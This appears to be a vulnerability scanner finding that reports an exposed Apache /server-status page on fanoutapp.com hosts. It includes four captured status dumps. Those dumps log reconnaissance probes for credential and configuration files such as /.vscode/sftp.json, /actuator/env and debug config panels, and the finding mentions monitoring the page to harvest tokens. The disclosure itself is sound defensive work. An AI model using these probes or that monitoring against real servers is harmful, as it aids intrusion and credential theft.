Apache 2.4.41
tcp/443 tcp/80
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabffe2305e1
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 09-Jan-2026 19:31:59 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 50 Parent Server MPM Generation: 49 Server uptime: 48 days 21 hours 37 minutes 24 seconds Server load: 0.29 0.15 0.14 Total accesses: 114757 - Total Traffic: 317.5 MB - Total Duration: 960324 CPU Usage: u85.02 s127.94 cu1359.49 cs401.74 - .0467% CPU load .0272 requests/sec - 78 B/second - 2901 B/request - 8.36833 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02178401no1yes124010 22178400no1yes025010 Sum202 149020 ___________________W_____.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4921784010/42/1442_ 1.15204182800.00.084.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-4921784010/29/1383_ 1.15184114090.00.064.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-4921784010/35/1431_ 1.15173137850.00.153.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-4921784010/36/1404_ 1.15163116970.00.084.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-4921784010/37/1435_ 1.15163125120.00.154.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-4921784010/43/1417_ 1.15153101770.00.124.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-4921784010/34/1426_ 1.15133105460.00.114.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-4921784010/40/1443_ 1.1693118000.00.094.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-4921784010/38/1433_ 1.16123126790.00.084.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-4921784010/37/1436_ 1.16113104180.00.084.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-4921784010/32/1429_ 1.16113117480.00.084.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-4921784010/40/1446_ 1.16103155480.00.104.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-4921784010/32/1418_ 1.1645107350.00.074.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4921784010/35/1400_ 1.1683112990.00.083.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4921784010/43/1441_ 1.1653144270.00.104.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-4921784010/33/1410_ 1.1673110380.00.084.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-4921784010/42/1430_ 1.1633117140.00.094.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4921784010/36/1431_ 1.1614127480.00.093.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4921784010/42/1426_ 1.1603134500.00.094.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-49217840121/34/1405W 1.1200127420.00.073.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4921784010/35/1411_ 1.097943123210.00.074.10 207.90.244.14http/1.1 0-4921784010/38/1428_ 1.147941127350.00.114.26 207.90.244.14http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4921784010/27/1402_ 1.1479319127800.00.064.26 207.90.244.14http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-4921784010/30/1389_ 1.152333118220.00.074.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-4921784010/41/1452_ 1.127932130250.00.174.41 207.90.244.14http/1.1 1-46-0/0/1489. 0.0024307512187180.00.004.13 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1473. 0.002430750132420.00.004.35 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1454. 0.002430759143750.00.003.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1504. 0.0024307512131870.00.004.39 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1449. 0.002430758139920.00.003.76 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1499. 0.0024307513143270.00.004.36 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1502. 0.002430752117340.00.004.46 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1480. 0.0024307512106800.00.004.00 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1476. 0.0024307512134150.00.004.32 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1469. 0.0024307512108670.00.003.96 157.52.117.24http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1493. 0.002430751130600.00.004.23 157.52.117.50http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1450. 0.002430755114550.00.003.83 167.82.233.138http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-46-0/0/1448. 0.0024307515106300.00.004.02 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1459. 0.0024307511126570.00.004.59 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?after=364 HTTP/1.1 1-46-0/0/1476. 0.002430759133750.00.004.04 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1458. 0.0024307515125140.00.004.28 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1480. 0.002430758110880.00.004.16 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1462. 0.0024307517128940.00.004.29 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1453. 0.002430758104680.00.004.39 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1495. 0.0024307512124260.00.004.35 198.235.24.201http/1.1 1-46-0/0/1468. 0.002430759123600.00.004.02 198.235.24.201http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-46-0/0/1470. 0.0024307514113090.00.003.96 167.82.233.52http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-46-0/0/1453. 0.0024307510112810.00.004.07 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=364 HTTP/1. 1-46-0/0/1490. 0.002430758110970.00.004.19 1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfad7064b1
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 04-Jan-2026 04:37:42 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 43 days 6 hours 43 minutes 7 seconds Server load: 0.24 0.22 0.17 Total accesses: 99854 - Total Traffic: 275.1 MB - Total Duration: 862687 CPU Usage: u74.67 s112.83 cu1210.89 cs359.59 - .047% CPU load .0267 requests/sec - 77 B/second - 2888 B/request - 8.63948 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01732023no2yes124020 11732024no1yes025010 Sum203 149030 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4417320230/10/1173_ 0.2113163060.00.103.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4417320230/9/1130_ 0.2113101660.00.093.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/9/1153_ 0.2113120160.00.092.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/9/1134_ 0.2113101390.00.093.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/9/1151_ 0.2113107400.00.093.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/10/1132_ 0.211186560.00.103.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/8/1165_ 0.211389330.00.093.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4417320230/9/1164_ 0.2203100080.00.093.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-4417320230/7/1151_ 0.2201110230.00.094.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/10/1172_ 0.220388400.00.093.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4417320230/8/1162_ 0.2203103300.00.094.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4417320230/10/1169_ 0.2203124690.00.103.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/7/1140_ 0.220393700.00.023.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-44173202314/7/1136W 0.200096890.00.163.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1151_ 0.2031121260.00.093.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/9/1146_ 0.202391540.00.023.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1156_ 0.2023102160.00.023.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1159_ 0.2121103210.00.103.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1142_ 0.2023116670.00.023.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/7/1143_ 0.2121111930.00.033.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/8/1148_ 0.2121104160.00.033.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/8/1150_ 0.2113109270.00.093.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/8/1151_ 0.2123114920.00.103.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/8/1128_ 0.212397750.00.093.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/9/1173_ 0.2113113700.00.023.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/29/1326_ 0.5334178460.00.063.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4417320240/27/1323_ 0.5303122030.00.063.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-4417320240/24/1298_ 0.5133137100.00.053.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/25/1346_ 0.51104126220.00.083.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/27/1296_ 0.5193133130.00.063.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/28/1339_ 0.51103130770.00.063.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-4417320240/26/1342_ 0.5193108290.00.053.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1327_ 0.5293101430.00.213.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1324_ 0.5289123220.00.123.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/25/1312_ 0.5293100290.00.053.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4417320240/25/1332_ 0.5283118550.00.053.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/24/1301_ 0.5363107120.00.053.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/26/1295_ 0.535398400.00.063.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1311_ 0.5383120250.00.054.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1316_ 0.5368124860.00.053.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1309_ 0.5363113710.00.053.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1325_ 0.5363104250.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/27/1301_ 0.5353122680.00.063.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1294_ 0.535396330.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/27/1338_ 0.5343116170.00.133.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5343115530.00.053.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5333105190.00.063.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/26/1306_ 0.5343107000.00.053.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/28/1334_ 0.533</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfae5bc81e
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 04-Jan-2026 04:37:40 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 43 days 6 hours 43 minutes 4 seconds Server load: 0.26 0.22 0.17 Total accesses: 99835 - Total Traffic: 275.0 MB - Total Duration: 862627 CPU Usage: u74.66 s112.83 cu1210.89 cs359.59 - .047% CPU load .0267 requests/sec - 77 B/second - 2888 B/request - 8.64053 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01732023no2yes124020 11732024no1yes025010 Sum203 149030 ____________________W_____________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4417320230/9/1172_ 0.1943163030.00.103.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1129_ 0.1945101630.00.093.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1152_ 0.1933120130.00.092.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1133_ 0.1933101360.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/8/1150_ 0.1923107370.00.093.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1131_ 0.192386540.00.093.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1164_ 0.182389290.00.093.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4417320230/8/1163_ 0.1923100040.00.093.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/6/1150_ 0.1923110220.00.094.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/9/1171_ 0.191388370.00.093.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/7/1161_ 0.1913103260.00.094.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/9/1168_ 0.1913124650.00.093.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/6/1139_ 0.201193660.00.023.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1136_ 0.200396890.00.163.37 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/7/1151_ 0.2001121260.00.093.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/9/1146_ 0.200391540.00.023.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1156_ 0.2003102160.00.023.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1159_ 0.2101103210.00.103.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1142_ 0.2003116670.00.023.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/7/1143_ 0.2101111930.00.033.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320236/7/1147W 0.1900104140.00.023.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1149_ 0.1943109230.00.093.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4417320230/7/1150_ 0.1953114890.00.093.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1127_ 0.194397710.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1172_ 0.1943113660.00.023.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/29/1326_ 0.5314178460.00.063.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4417320240/26/1322_ 0.5183121990.00.063.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1298_ 0.5113137100.00.053.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/25/1346_ 0.5184126220.00.083.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/27/1296_ 0.5173133130.00.063.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/28/1339_ 0.5173130770.00.063.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-4417320240/26/1342_ 0.5173108290.00.053.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1327_ 0.5273101430.00.213.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1324_ 0.5269123220.00.123.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/25/1312_ 0.5263100290.00.053.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4417320240/25/1332_ 0.5263118550.00.053.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/24/1301_ 0.5343107120.00.053.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/26/1295_ 0.533398400.00.063.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1311_ 0.5353120250.00.054.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1316_ 0.5348124860.00.053.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1309_ 0.5343113710.00.053.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1325_ 0.5333104250.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/27/1301_ 0.5333122680.00.063.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1294_ 0.533396330.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/27/1338_ 0.5323116170.00.133.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5323115530.00.053.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5313105190.00.063.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/26/1306_ 0.5323107000.00.053.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfc12ec930
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 04-Jan-2026 04:37:39 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 43 days 6 hours 43 minutes 4 seconds Server load: 0.26 0.22 0.17 Total accesses: 99833 - Total Traffic: 275.0 MB - Total Duration: 862623 CPU Usage: u74.65 s112.83 cu1210.89 cs359.59 - .047% CPU load .0267 requests/sec - 77 B/second - 2888 B/request - 8.64066 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01732023no2yes124020 11732024no1yes025010 Sum203 149030 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4417320230/9/1172_ 0.1943163030.00.103.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1129_ 0.1935101630.00.093.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1152_ 0.1933120130.00.092.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1133_ 0.1933101360.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/8/1150_ 0.1923107370.00.093.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1131_ 0.192386540.00.093.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1164_ 0.182389290.00.093.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4417320230/8/1163_ 0.1923100040.00.093.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/6/1150_ 0.1923110220.00.094.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/9/1171_ 0.191388370.00.093.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/7/1161_ 0.1913103260.00.094.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/9/1168_ 0.1913124650.00.093.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/6/1139_ 0.201193660.00.023.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1136_ 0.200396890.00.163.37 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/7/1151_ 0.2001121260.00.093.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/9/1146_ 0.200391540.00.023.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1156_ 0.2003102160.00.023.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320234/8/1158W 0.1900103190.00.093.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1142_ 0.2003116670.00.023.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320230/6/1142_ 0.1953111920.00.023.14 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4417320230/7/1147_ 0.1953104140.00.023.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4417320230/7/1149_ 0.1943109230.00.093.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4417320230/7/1150_ 0.1953114890.00.093.47 